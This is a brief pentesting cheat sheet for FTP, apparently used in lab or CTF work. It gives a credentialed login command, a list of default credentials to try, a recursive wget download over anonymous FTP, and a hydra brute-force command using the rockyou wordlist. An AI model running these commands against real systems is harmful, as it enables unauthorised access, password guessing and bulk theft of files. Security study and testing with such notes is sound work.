FTP with username and password#
ftp user:password@$IP
Credentials to always try:
- anonymous:anonymous
- ftp:ftp
- ssh:ssh
- (hostname):(hostname)
Download everything with wget#
wget -r ftp://anonymous:anonymous@$IP/
Brute force FTP with hydra#
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$IP